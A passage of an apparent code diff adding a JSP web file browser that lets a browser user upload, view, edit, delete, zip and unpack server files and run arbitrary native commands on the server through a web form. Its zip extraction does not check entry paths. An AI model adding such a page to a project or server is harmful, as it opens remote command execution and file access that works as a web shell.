currentLine)) { + os.write(previousLine, 0, read - 2); + line = new String(currentLine, 0, read3); + break; + } + else { + os.write(previousLine, 0, read); + uplInfo.currSize += read; + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + }//end else + }//end while + os.flush(); + os.close(); + if (!saveFiles) { + ByteArrayOutputStream baos = (ByteArrayOutputStream) os; + fileInfo.setFileContents(baos.toByteArray()); + } + else fileInfo.file = new File(path); + dataTable.put(paramName, fileInfo); + uplInfo.currSize = uplInfo.totalSize; + }//end try + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + /** + * Compares boundary string to byte array + */ + private boolean compareBoundary(String boundary, byte ba[]) { + if (boundary == null || ba == null) return false; + for (int i = 0; i < boundary.length(); i++) + if ((byte) boundary.charAt(i) != ba[i]) return false; + return true; + } + + /** Convenience method to read HTTP header lines */ + private synchronized String getLine(ServletInputStream sis) throws IOException { + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1) { + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); + } + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException { + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException( + "dir or fileName is null"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } //End of class HttpMultiPartParser + + /** + * This class is a comparator to sort the filenames and dirs + */ + class FileComp implements Comparator { + + int mode; + int sign; + + FileComp() { + this.mode = 1; + this.sign = 1; + } + + /** + * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type + * The default sorting method is by Name + * Negative mode means descending sort + */ + FileComp(int mode) { + if (mode < 0) { + this.mode = -mode; + sign = -1; + } + else { + this.mode = mode; + this.sign = 1; + } + } + + public int compare(Object o1, Object o2) { + File f1 = (File) o1; + File f2 = (File) o2; + if (f1.isDirectory()) { + if (f2.isDirectory()) { + switch (mode) { + //Filename or Type + case 1: + case 4: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + //Filesize + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + //Date + case 3: + return sign + * (new Long(f1.lastModified()) + .compareTo(new Long(f2.lastModified()))); + default: + return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else { + switch (mode) { + case 1: + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + case 2: + return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); + case 3: + return sign + * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); + case 4: { // Sort by extension + int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); + int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); + if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension + return sign + * f1.getAbsolutePath().toUpperCase().compareTo( + f2.getAbsolutePath().toUpperCase()); + } + // f1 has no extension + else if (tempIndexf1 == -1) return -sign; + // f2 has no extension + else if (tempIndexf2 == -1) return sign; + // Both have an extension + else { + String tempEndf1 = f1.getAbsolutePath().toUpperCase() + .substring(tempIndexf1); + String tempEndf2 = f2.getAbsolutePath().toUpperCase() + .substring(tempIndexf2); + return sign * tempEndf1.compareTo(tempEndf2); + } + } + default: + return 1; + } + } + } + } + + /** + * Wrapperclass to wrap an OutputStream around a Writer + */ + class Writer2Stream extends OutputStream { + + Writer out; + + Writer2Stream(Writer w) { + super(); + out = w; + } + + public void write(int i) throws IOException { + out.write(i); + } + + public void write(byte[] b) throws IOException { + for (int i = 0; i < b.length; i++) { + int n = b[i]; + //Convert byte to ubyte + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + + public void write(byte[] b, int off, int len) throws IOException { + for (int i = off; i < off + len; i++) { + int n = b[i]; + n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); + out.write(n); + } + } + } //End of class Writer2Stream + + static Vector expandFileList(String[] files, boolean inclDirs) { + Vector v = new Vector(); + if (files == null) return v; + for (int i = 0; i < files.length; i++) + v.add(new File(URLDecoder.decode(files[i]))); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.isDirectory()) { + File[] fs = f.listFiles(); + for (int n = 0; n < fs.length; n++) + v.add(fs[n]); + if (!inclDirs) { + v.remove(i); + i--; + } + } + } + return v; + } + + /** + * Method to build an absolute path + * @param dir the root dir + * @param name the name of the new directory + * @return if name is an absolute directory, returns name, else returns dir+name + */ + static String getDir(String dir, String name) { + if (!dir.endsWith(File.separator)) dir = dir + File.separator; + File mv = new File(name); + String new_dir = null; + if (!mv.isAbsolute()) { + new_dir = dir + name; + } + else new_dir = name; + return new_dir; + } + + /** + * This Method converts a byte size in a kbytes or Mbytes size, depending on the size + * @param size The size in bytes + * @return String with size and unit + */ + static String convertFileSize(long size) { + int divisor = 1; + String unit = "bytes"; + if (size >= 1024 * 1024) { + divisor = 1024 * 1024; + unit = "MB"; + } + else if (size >= 1024) { + divisor = 1024; + unit = "KB"; + } + if (divisor == 1) return size / divisor + " " + unit; + String aftercomma = "" + 100 * (size % divisor) / divisor; + if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; + return size / divisor + "." + aftercomma + " " + unit; + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { + copyStreamsWithoutClose(in, out, buffer); + in.close(); + out.close(); + } + + /** + * Copies all data from in to out + * @param in the input stream + * @param out the output stream + * @param buffer copy buffer + */ + static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) + throws IOException { + int b; + while ((b = in.read(buffer)) != -1) + out.write(buffer, 0, b); + } + + /** + * Returns the Mime Type of the file, depending on the extension of the filename + */ + static String getMimeType(String fName) { + fName = fName.toLowerCase(); + if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; + else if (fName.endsWith(".gif")) return "image/gif"; + else if (fName.endsWith(".pdf")) return "application/pdf"; + else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; + else if (fName.endsWith(".avi")) return "video/x-msvideo"; + else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; + else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; + else if (fName.endsWith(".zip")) return "application/zip"; + else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; + else if (fName.endsWith(".rtf")) return "application/rtf"; + else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; + else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") + || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") + || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; + else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; + else if (fName.endsWith(".png")) return "image/png"; + else if (fName.endsWith(".xml")) return "text/xml"; + else if (fName.endsWith(".svg")) return "image/svg+xml"; + else if (fName.endsWith(".mp3")) return "audio/mp3"; + else if (fName.endsWith(".ogg")) return "audio/ogg"; + else return "text/plain"; + } + + /** + * Converts some important chars (int) to the corresponding html string + */ + static String conv2Html(int i) { + if (i == '&') return "&"; + else if (i == '<') return "<"; + else if (i == '>') return ">"; + else if (i == '"') return """; + else return "" + (char) i; + } + + /** + * Converts a normal string to a html conform string + */ + static String conv2Html(String st) { + StringBuffer buf = new StringBuffer(); + for (int i = 0; i < st.length(); i++) { + buf.append(conv2Html(st.charAt(i))); + } + return buf.toString(); + } + + /** + * Starts a native process on the server + * @param command the command to start the process + * @param dir the dir in which the process starts + */ + static String startProcess(String command, String dir) throws IOException { + StringBuffer ret = new StringBuffer(); + String[] comm = new String[3]; + comm[0] = COMMAND_INTERPRETER[0]; + comm[1] = COMMAND_INTERPRETER[1]; + comm[2] = command; + long start = System.currentTimeMillis(); + try { + //Start process + Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); + //Get input and error streams + BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); + BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); + boolean end = false; + while (!end) { + int c = 0; + while ((ls_err.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_err.read())); + } + c = 0; + while ((ls_in.available() > 0) && (++c <= 1000)) { + ret.append(conv2Html(ls_in.read())); + } + try { + ls_proc.exitValue(); + //if the process has not finished, an exception is thrown + //else + while (ls_err.available() > 0) + ret.append(conv2Html(ls_err.read())); + while (ls_in.available() > 0) + ret.append(conv2Html(ls_in.read())); + end = true; + } + catch (IllegalThreadStateException ex) { + //Process is running + } + //The process is not allowed to run longer than given time. + if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { + ls_proc.destroy(); + end = true; + ret.append("!!!! Process has timed out, destroyed !!!!!"); + } + try { + Thread.sleep(50); + } + catch (InterruptedException ie) {} + } + } + catch (IOException e) { + ret.append("Error: " + e); + } + return ret.toString(); + } + + /** + * Converts a dir string to a linked dir string + * @param dir the directory string (e.g. /usr/local/httpd) + * @param browserLink web-path to Browser.jsp + */ + static String dir2linkdir(String dir, String browserLink, int sortMode) { + File f = new File(dir); + StringBuffer buf = new StringBuffer(); + while (f.getParentFile() != null) { + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getName()) + File.separator + ""); + } + else buf.insert(0, conv2Html(f.getName()) + File.separator); + f = f.getParentFile(); + } + if (f.canRead()) { + String encPath = URLEncoder.encode(f.getAbsolutePath()); + buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + ""); + } + else buf.insert(0, f.getAbsolutePath()); + return buf.toString(); + } + + /** + * Returns true if the given filename tends towards a packed file + */ + static boolean isPacked(String name, boolean gz) { + return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar") + || (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase() + .endsWith(".war")); + } + + /** + * If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not + */ + static boolean isAllowed(File path, boolean write) throws IOException{ + if (READ_ONLY && write) return false; + if (RESTRICT_BROWSING) { + StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";"); + while (stk.hasMoreTokens()){ + if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken())) + return RESTRICT_WHITELIST; + } + return !RESTRICT_WHITELIST; + } + else return true; + } + + //--------------------------------------------------------------------------------------------------------------- + + %> +<% + //Get the current browsing directory + request.setAttribute("dir", request.getParameter("dir")); + // The browser_name variable is used to keep track of the URI + // of the jsp file itself. It is used in all link-backs. + final String browser_name = request.getRequestURI(); + final String FOL_IMG = ""; + boolean nohtml = false; + boolean dir_view = true; + //Get Javascript + if (request.getParameter("Javascript") != null) { + dir_view = false; + nohtml = true; + //Tell the browser that it should cache the javascript + response.setHeader("Cache-Control", "public"); + Date now = new Date(); + SimpleDateFormat sdf = new SimpleDateFormat("EEE, d MMM yyyy HH:mm:ss z", Locale.US); + response.setHeader("Expires", sdf.format(new Date(now.getTime() + 1000 * 60 * 60 * 24*2))); + response.setHeader("Content-Type", "text/javascript"); + %> + <%// This section contains the Javascript used for interface elements %> + var check = false; + <%// Disables the checkbox feature %> + function dis(){check = true;} + + var DOM = 0, MS = 0, OP = 0, b = 0; + <%// Determine the browser type %> + function CheckBrowser(){ + if (b == 0){ + if (window.opera) OP = 1; + // Moz or Netscape + if(document.getElementById) DOM = 1; + // Micro$oft + if(document.all && !OP) MS = 1; + b = 1; + } + } + <%// Allows the whole row to be selected %> + function selrow (element, i){ + var erst; + CheckBrowser(); + if ((OP==1)||(MS==1)) erst = element.firstChild.firstChild; + else if (DOM==1) erst = element.firstChild.nextSibling.firstChild; + <%// MouseIn %> + if (i==0){ + if (erst.checked == true) element.className='mousechecked'; + else element.className='mousein'; + } + <%// MouseOut %> + else if (i==1){ + if (erst.checked == true) element.className='checked'; + else element.className='mouseout'; + } + <% // MouseClick %> + else if ((i==2)&&(!check)){ + if (erst.checked==true) element.className='mousein'; + else element.className='mousechecked'; + erst.click(); + } + else check=false; + } + <%// Filter files and dirs in FileList%> + function filter (begriff){ + var suche = begriff.value.toLowerCase(); + var table = document.getElementById("filetable"); + var ele; + for (var r = 1; r < table.rows.length; r++){ + ele = table.rows[r].cells[1].innerHTML.replace(/<[^>]+>/g,""); + if (ele.toLowerCase().indexOf(suche)>=0 ) + table.rows[r].style.display = ''; + else table.rows[r].style.display = 'none'; + } + } + <%//(De)select all checkboxes%> + function AllFiles(){ + for(var x=0;x < document.FileList.elements.length;x++){ + var y = document.FileList.elements[x]; + var ytr = y.parentNode.parentNode; + var check = document.FileList.selall.checked; + if(y.name == 'selfile' && ytr.style.display != 'none'){ + if (y.disabled != true){ + y.checked = check; + if (y.checked == true) ytr.className = 'checked'; + else ytr.className = 'mouseout'; + } + } + } + } + + function shortKeyHandler(_event){ + if (!_event) _event = window.event; + if (_event.which) { + keycode = _event.which; + } else if (_event.keyCode) { + keycode = _event.keyCode; + } + var t = document.getElementById("text_Dir"); + //z + if (keycode == 122){ + document.getElementById("but_Zip").click(); + } + //r, F2 + else if (keycode == 113 || keycode == 114){ + var path = prompt("Please enter new filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Ren").click(); + } + //c + else if (keycode == 99){ + var path = prompt("Please enter filename", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NFi").click(); + } + //d + else if (keycode == 100){ + var path = prompt("Please enter directory name", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_NDi").click(); + } + //m + else if (keycode == 109){ + var path = prompt("Please enter move destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Mov").click(); + } + //y + else if (keycode == 121){ + var path = prompt("Please enter copy destination", ""); + if (path == null) return; + t.value = path; + document.getElementById("but_Cop").click(); + } + //l + else if (keycode == 108){ + document.getElementById("but_Lau").click(); + } + //Del + else if (keycode == 46){ + document.getElementById("but_Del").click(); + } + } + + function popUp(URL){ + fname = document.getElementsByName("myFile")[0].value; + if (fname != "") + window.open(URL+"?first&uplMonitor="+encodeURIComponent(fname),"","width=400,height=150,resizable=yes,depend=yes") + } + + document.onkeypress = shortKeyHandler; +<% } + // View file + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)) { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access "+f.getAbsolutePath()); + } + else if (f.exists() && f.canRead()) { + if (isPacked(f.getName(), false)) { + //If zipFile, do nothing here + } + else{ + String mimeType = getMimeType(f.getName()); + response.setContentType(mimeType); + if (mimeType.equals("text/plain")) response.setHeader( + "Content-Disposition", "inline;filename=\"temp.txt\""); + else response.setHeader("Content-Disposition", "inline;filename=\"" + + f.getName() + "\""); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + // Download selected files as zip file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(SAVE_AS_ZIP))) { + Vector v = expandFileList(request.getParameterValues("selfile"), false); + //Check if all files in vector are allowed + String notAllowedFile = null; + for (int i = 0;i < v.size(); i++){ + File f = (File) v.get(i); + if (!isAllowed(f, false)){ + notAllowedFile = f.getAbsolutePath(); + break; + } + } + if (notAllowedFile != null){ + request.setAttribute("error", "You are not allowed to access " + notAllowedFile); + } + else if (v.size() == 0) { + request.setAttribute("error", "No files selected"); + } + else { + File dir_file = new File("" + request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType("application/zip"); + response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); + zipout.setLevel(COMPRESSION_LEVEL); + for (int i = 0; i < v.size(); i++) { + File f = (File) v.get(i); + if (f.canRead()) { + zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); + BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[0xffff]; + copyStreamsWithoutClose(fr, zipout, buffer); + /* int b; + while ((b=fr.read())!=-1) zipout.write(b);*/ + fr.close(); + zipout.closeEntry(); + } + } + zipout.finish(); + out.flush(); + nohtml = true; + dir_view = false; + } + } + // Download file + else if (request.getParameter("downfile") != null) { + String filePath = request.getParameter("downfile"); + File f = new File(filePath); + if (!isAllowed(f, false)){ + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); + } + else if (f.exists() && f.canRead()) { + response.setContentType("application/octet-stream"); + response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() + + "\""); + response.setContentLength((int) f.length()); + BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); + byte buffer[] = new byte[8 * 1024]; + out.clearBuffer(); + OutputStream out_s = new Writer2Stream(out); + copyStreamsWithoutClose(fileInput, out_s, buffer); + fileInput.close(); + out_s.flush(); + nohtml = true; + dir_view = false; + } + else { + request.setAttribute("dir", f.getParent()); + request.setAttribute("error", "File " + f.getAbsolutePath() + + " does not exist or is not readable on the server"); + } + } + if (nohtml) return; + //else + // If no parameter is submitted, it will take the path from jsp file browser + if (request.getAttribute("dir") == null) { + String path = null; + if (application.getRealPath(request.getRequestURI()) != null) { + File f = new File(application.getRealPath(request.getRequestURI())).getParentFile(); + //This is a hack needed for tomcat + while (f != null && !f.exists()) + f = f.getParentFile(); + if (f != null) + path = f.getAbsolutePath(); + } + if (path == null) { // handle the case where we are not in a directory (ex: war file) + path = new File(".").getAbsolutePath(); + } + //Check path + if (!isAllowed(new File(path), false)){ + //TODO Blacklist + if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; + else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); + } + request.setAttribute("dir", path); + }%> + + + + + + + +<% + //If a cssfile exists, it will take it + String cssPath = null; + if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( + application.getRealPath(request.getRequestURI())).getParent() + + File.separator + CSS_NAME; + if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); + if (new File(cssPath).exists()) { +%> + + <%} + else if (request.getParameter("uplMonitor") == null) {%> + + <%} + + //Check path + if (!isAllowed(new File((String)request.getAttribute("dir")), false)){ + request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); + } + //Upload monitor + else if (request.getParameter("uplMonitor") != null) {%> + <% + String fname = request.getParameter("uplMonitor"); + //First opening + boolean first = false; + if (request.getParameter("first") != null) first = true; + UplInfo info = new UplInfo(); + if (!first) { + info = UploadMonitor.getInfo(fname); + if (info == null) { + //Windows + int posi = fname.lastIndexOf("\\"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + if (info == null) { + //Unix + int posi = fname.lastIndexOf("/"); + if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); + } + } + dir_view = false; + request.setAttribute("dir", null); + if (info.aborted) { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload aborted. +<% + } + else if (info.totalSize != info.currSize || info.currSize == 0) { + %> + + + +Upload of <%=fname%>

    +
    + + +
    +<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> +(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
    +Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> + +<% + } + else { + UploadMonitor.remove(fname); + %> + + +Upload of <%=fname%>

    +Upload finished. + +<% + } + } + //Comandwindow + else if (request.getParameter("command") != null) { + if (!NATIVE_COMMANDS){ + request.setAttribute("error", "Execution of native commands is not allowed!"); + } + else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { +%> +Launch commands in <%=request.getAttribute("dir")%> + +
    +

    <%=LAUNCH_COMMAND %>


    +<% + out.println("
    \n" + + " + "> +

    + + + +
    + Command: +
    + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    +
    + + +<% + dir_view = false; + request.setAttribute("dir", null); + } + } + + //Click on a filename, special viewer (zip+jar file) + else if (request.getParameter("file") != null) { + File f = new File(request.getParameter("file")); + if (!isAllowed(f, false)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + } + else if (isPacked(f.getName(), false)) { + //ZipFile + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); +%> +<%= f.getAbsolutePath()%> + + +

    Content of <%=conv2Html(f.getName())%>


    + + +<% + long size = 0; + int fileCount = 0; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory()) { + fileCount++; + size += entry.getSize(); + long ratio = 0; + if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) + / entry.getSize(); + out.println(""); + + } + } + zf.close(); + //No directory view + dir_view = false; + request.setAttribute("dir", null); +%> +
    NameUncompressed sizeCompressed sizeCompr. ratioDate
    " + conv2Html(entry.getName()) + + "" + convertFileSize(entry.getSize()) + "" + + convertFileSize(entry.getCompressedSize()) + "" + + ratio + "%" + "" + + dateFormat.format(new Date(entry.getTime())) + "
    +

    + <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% +

    + +<% + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot read " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " + + ex); + } + } + } + // Upload + else if ((request.getContentType() != null) + && (request.getContentType().toLowerCase().startsWith("multipart"))) { + if (!ALLOW_UPLOAD){ + request.setAttribute("error", "Upload is forbidden!"); + } + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try { + int bstart = request.getContentType().lastIndexOf("oundary="); + String bound = request.getContentType().substring(bstart + 8); + int clength = request.getContentLength(); + Hashtable ht = parser + .processData(request.getInputStream(), bound, tempdir, clength); + if (!isAllowed(new File((String)ht.get("dir")), false)){ + //This is a hack, cos we are writing to this directory + request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); + error = true; + } + else if (ht.get("myFile") != null) { + FileInfo fi = (FileInfo) ht.get("myFile"); + File f = fi.file; + UplInfo info = UploadMonitor.getInfo(fi.clientFileName); + if (info != null && info.aborted) { + f.delete(); + request.setAttribute("error", "Upload aborted"); + } + else { + // Move file from temp to the right dir + String path = (String) ht.get("dir"); + if (!path.endsWith(File.separator)) path = path + File.separator; + if (!f.renameTo(new File(path + f.getName()))) { + request.setAttribute("error", "Cannot upload file."); + error = true; + f.delete(); + } + } + } + else { + request.setAttribute("error", "No file selected for upload"); + error = true; + } + request.setAttribute("dir", (String) ht.get("dir")); + } + catch (Exception e) { + request.setAttribute("error", "Error " + e + ". Upload aborted"); + error = true; + } + if (!error) request.setAttribute("message", "File upload correctly finished."); + } + // The form to edit a text file + else if (request.getParameter("editfile") != null) { + File ef = new File(request.getParameter("editfile")); + if (!isAllowed(ef, true)){ + request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); + } + else{ +%> +Edit <%=conv2Html(request.getParameter("editfile"))%> + + +
    +

    Edit <%=conv2Html(request.getParameter("editfile"))%>


    +<% + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = " readonly"; + out.println("
    \n" + + "

    + + "> + "> + + + + + + + +
    >Ms-Dos/Windows + >Unix + Write backup
    +
    + + "> + "> +
    +
    +
    +
    +
    + jsp File Browser version <%= VERSION_NR%> by www.vonloesch.de +
    + + +<% + } + } + // Save or cancel the edited file + else if (request.getParameter("nfile") != null) { + File f = new File(request.getParameter("nfile")); + if (request.getParameter("Submit").equals("Save")) { + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (!isAllowed(new_f, true)){ + request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); + } + if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { + File bak = new File(new_f.getAbsolutePath() + ".bak"); + bak.delete(); + new_f.renameTo(bak); + } + if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", + "Cannot write to " + new_f.getName() + ", file is write protected."); + else { + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + StringReader text = new StringReader(request.getParameter("text")); + int i; + boolean cr = false; + String lineend = "\n"; + if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; + while ((i = text.read()) >= 0) { + if (i == '\r') cr = true; + else if (i == '\n') { + outs.write(lineend); + cr = false; + } + else if (cr) { + outs.write(lineend); + cr = false; + } + else { + outs.write(i); + cr = false; + } + } + outs.flush(); + outs.close(); + } + } + request.setAttribute("dir", f.getParent()); + } + //Unpack file to the current directory without overwriting + else if (request.getParameter("unpackfile") != null) { + File f = new File(request.getParameter("unpackfile")); + String root = f.getParent(); + request.setAttribute("dir", root); + if (!isAllowed(new File(root), true)){ + request.setAttribute("error", "You are not allowed to access " + root); + } + //Check if file exists + else if (!f.exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", file does not exist"); + } + //Check if directory is readonly + else if (!f.getParentFile().canWrite()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", directory is write protected."); + } + //GZip + else if (f.getName().toLowerCase().endsWith(".gz")) { + //New name is old Name without .gz + String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); + try { + byte buffer[] = new byte[0xffff]; + copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( + newName), buffer); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + //Else try Zip + else { + try { + ZipFile zf = new ZipFile(f); + Enumeration entries = zf.entries(); + //First check whether a file already exist + boolean error = false; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + if (!entry.isDirectory() + && new File(root + File.separator + entry.getName()).exists()) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", File " + entry.getName() + " already exists."); + error = true; + break; + } + } + if (!error) { + //Unpack File + entries = zf.entries(); + byte buffer[] = new byte[0xffff]; + while (entries.hasMoreElements()) { + ZipEntry entry = (ZipEntry) entries.nextElement(); + File n = new File(root + File.separator + entry.getName()); + if (entry.isDirectory()) n.mkdirs(); + else { + n.getParentFile().mkdirs(); + n.createNewFile(); + copyStreams(zf.getInputStream(entry), new FileOutputStream(n), + buffer); + } + } + zf.close(); + request.setAttribute("message", "Unpack of " + f.getName() + + " was successful."); + } + } + catch (ZipException ex) { + request.setAttribute("error", "Cannot unpack " + f.getName() + + ", no valid zip file"); + } + catch (IOException ex) { + request.setAttribute("error", "Unpacking of " + f.getName() + + " aborted. Error: " + ex); + } + } + } + // Delete Files + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(DELETE_FILES))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + //delete backwards + for (int i = v.size() - 1; i >= 0; i--) { + File f = (File) v.get(i); + if (!isAllowed(f, true)){ + request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); + error = true; + break; + } + if (!f.canWrite() || !f.delete()) { + request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() + + ". Deletion aborted"); + error = true; + break; + } + } + if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); + else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("error", "No files selected"); + } + // Create Directory + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_DIR))) { + String dir = "" + request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + if (!isAllowed(new File(new_dir), true)){ + request.setAttribute("error", "You are not allowed to access " + new_dir); + } + else if (new File(new_dir).mkdirs()) { + request.setAttribute("message", "Directory created"); + } + else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); + } + // Create a new empty file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(CREATE_FILE))) { + String dir = "" + request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir(dir, file_name); + if (!isAllowed(new File(new_file), true)){ + request.setAttribute("error", "You are not allowed to access " + new_file); + } + // Test, if file_name is empty + else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { + if (new File(new_file).createNewFile()) request.setAttribute("message", + "File created"); + else request.setAttribute("error", "Creation of file " + new_file + " failed"); + } + else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); + } + // Rename a file + else if ((request.getParameter("Submit") != null) + && (request.getParameter("Submit").equals(RENAME_FILE))) { + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = "" + request.getAttribute("dir"); + String new_file_name = request.getParameter("cr_dir"); + String new_file 